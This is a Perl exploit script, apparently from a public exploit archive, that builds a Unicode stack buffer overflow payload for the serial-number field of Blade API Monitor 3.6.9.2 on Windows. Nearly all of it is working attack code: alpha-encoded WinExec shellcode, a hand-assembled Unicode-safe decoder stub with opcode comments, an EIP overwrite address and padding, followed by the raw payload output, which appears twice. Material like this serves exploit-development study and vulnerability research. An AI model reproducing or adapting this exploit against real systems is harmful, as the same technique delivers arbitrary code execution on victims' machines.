# Exploit Title: Blade API Monitor Unicode Stack Buffer Overflow (the serial number!!)
# Date: 25/12/2011
# Author: FullMetalFouad
# Version: 3.6.9.2
# Tested on: Windows XP/7
################################################################
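use strict;
use warnings;

# This script only assembles the byte string described in the comments below
# and writes it to $file in the current directory; writing that file is its
# single side effect.
my $file= "bof_blade.txt";
# windows/Winexec - 178 bytes
# VERBOSE=false, EXITFUNC=process, CMD=calc encoder=Alpha3
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\calc.txt" --verbose
my $shellcode_calc =
"hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J".
"0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I".
"2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W".
"0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p".
"034r032m334t3w3m02";
#
# first stage to prepare the $shellcode_calc execution :
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\shellcode.txt" --verbose
# "\x05\xF6\xFC\xFF\xFF" ;# sub eax, 30A
# "\x33\xDB" ;# xor ebx,ebx
# "\x33\xC9" ;# xor ecx,ecx
# "\xFE\xC5" ;# inc ch
#
# "\x43" ;# inc ebx
# "\x8A\x14\x58" ;# mov dl, [eax+ebx*2]
# "\x88\x14\x18" ;# mov [eax+ebx], dl
# "\xE2\xF7" ;# loop
# "\xFF\xE0" ;# jmp eax
my $shellcode = "hffffk4diFkTpk02Tpl0T0Bu".
"EE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0m";
my $junk1 = "\xCC" x 104;
$junk1 = $junk1 ."\x35" x 2; # ECX
$junk1 = $junk1 ."\x41" x 6; # EBP
my $eip = "\x3e\x43"; # 0x0043003e : call ebx | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [BladeAPIMonitor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.6.9.2 (C:\Program Files\BladeAPIMonitor\BladeAPIMonitor.exe)
my $junk2 = "\x42" x 20;
my $buffer = "\x41" x 246;
my $finder = "";
my $part0 = "";
my $part1 = "";
my $part2 = "";
my $part3 = "";
# 0 part : we do EAX = EBX + length(part0+part1+part2 +1 ), to point to the first null byte of the loop code.
# _part_0_:__________________________________________________
$part0 = $part0. "\x53"; # | 53 push ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xBA\x58\x58"; # | BA00580058 mov edx, 58005800 |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al |
$part0 = $part0. "\x54"; # | 54 push esp |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x5F"; # | 5F pop edi |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xB9\x3B\x3B"; # | B9003B003B mov ecx, 3B003B00 (diff) |
$part0 = $part0. "\xF5"; # | 00F5 add ch,dh |
$part0 = $part0. "\x6F"; # | 006F00 add [edi+0x0],ch |
$part0 = $part0. "\xD6"; # | D6 salc |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x5B"; # | 5B pop ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x50"; # | 50 push eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x54"; # | 54 push esp |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xC1\x19"; # | C10019 rol dword ptr [eax], 19 |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\xC7"; # | 00C7 add bh,al |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x53"; # | 53 push ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x52"; # | 52 push edx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
##################################### |__________________________________________________________|
# 1st part : we do EBX=0x00000000, and ECX=0x00000100 (approximative size of buffer)
# _part_1_:__________________________________________________
$part1 = $part1. "\x6A"; # | 6A00 push dword 0x00000000 |
$part1 = $part1. "\x6A"; # | 6A00 push dword 0x00000000 |
$part1 = $part1. "\x5B"; # | 5B pop ebx |
$part1 = $part1. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part1 = $part1. "\x59"; # | 59 pop ecx |
$part1 = $part1. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part1 = $part1. "\xBA\x01\x41"; # | BA00010041 mov edx,0x41000100 |
$part1 = $part1. "\xF5"; # | 00F5 add ch,dh |
##################################### |__________________________________________________________|
# 2nd part : The patching of the 'loop code' :
# _part_2_:__________________________________________________
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x5A"; # | 5A pop edx |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\x32"; # | C60032 mov byte [eax],0x32 ; 0x8A-0x58 |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh ; 0x58 |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh ; 0x88 dh=58 |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\x14"; # | C60014 mov byte [eax],0x14 ; 0x14 |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\xE2"; # | C600E2 mov byte [eax],0xE2 ; 0xE2 |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
# |__________________________________________________________|
# 3rd part : The loop code (stuffed with nulls of course)
# _part_3_:___________________________________________________
# | ; eax points to our shellcode |
# | ; ebx is 0x00000000 |
# | ; ecx is 0x00000500 (for example) |
# | |
# | label: |
$part3 = $part3. "\x43"; # | 43 inc ebx |
$part3 = $part3. "\x14"; # | 8A1458 mov byte dl,[eax+2*ebx] |
$part3 = $part3. "\x30\x18"; # | 881418 mov byte [eax+ebx],dl |
$part3 = $part3. "\xF7"; # | E2F7 loop label |
# |__________________________________________________________|
$finder = $part0.$part1.$part2.$part3;
# Three-argument open on a lexical handle, with the result checked: the
# original two-argument, unchecked open would report success even when the
# file could not be created.
open(my $out_fh, '>', $file) or die "open $file: $!";
# The content is raw bytes, so turn off any newline translation on the handle.
binmode($out_fh);
print {$out_fh} $shellcode_calc.$junk1.$eip.$junk2.$finder.$shellcode."\xFF\xFF\xFF\xFF".$buffer."\x43\x43\x43\x43";
# Buffered write errors only surface at close, so that result is checked too.
close($out_fh) or die "close $file: $!";
print "File Created successfully\n";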
# output: hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCChffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC